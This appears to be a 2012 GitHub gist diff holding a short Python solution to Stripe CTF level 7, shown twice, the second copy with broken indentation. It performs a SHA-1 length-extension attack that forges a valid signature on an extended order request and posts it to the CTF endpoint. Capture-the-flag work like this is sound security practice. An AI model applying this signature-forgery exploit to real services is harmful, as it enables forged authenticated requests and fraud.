eskerda · August 28, 2012 17:06
diff --git a/gistfile1.py b/gistfile1.py
 import urllib
 import hashlib
 import requests

 from shaext import shaext

 """
 http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack/
 - shaext.py
 - code from sha-padding.py
 """


 known_message = "count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken"
 known_signature = "b017049dd1ce7db05aab96bee0b79e35b9e5bbd2"
 endpoint = "https://level07-2.stripe-ctf.com/user-jgpxxqxwhd/"
 secret_len = 14
 exp_data = "&waffle=liege&user=5&lat=999&lng=999&count=42"

 def main():
    padding = shaext(known_message, secret_len, known_signature)
    padding.add(exp_data)
    (new_msg, new_sig)= padding.final()
    sig_msg = "%s|sig:%s" % (new_msg, new_sig)
    req = requests.post("%s/%s" % (endpoint, 'orders'), data=sig_msg) 
    print req.text

 if __name__ == '__main__':
    main()
	import urllib
	import hashlib
	import requests

	from shaext import shaext

	"""
	http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack/
	- shaext.py
	- code from sha-padding.py
	"""


	known_message = "count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken"
	known_signature = "b017049dd1ce7db05aab96bee0b79e35b9e5bbd2"
	endpoint = "https://level07-2.stripe-ctf.com/user-jgpxxqxwhd/"
	secret_len = 14
	exp_data = "&waffle=liege&user=5&lat=999&lng=999&count=42"

	def main():
	padding = shaext(known_message, secret_len, known_signature)
	padding.add(exp_data)
	(new_msg, new_sig)= padding.final()
	sig_msg = "%s\|sig:%s" % (new_msg, new_sig)
	req = requests.post("%s/%s" % (endpoint, 'orders'), data=sig_msg)
	print req.text

	if __name__ == '__main__':
	main()
No results found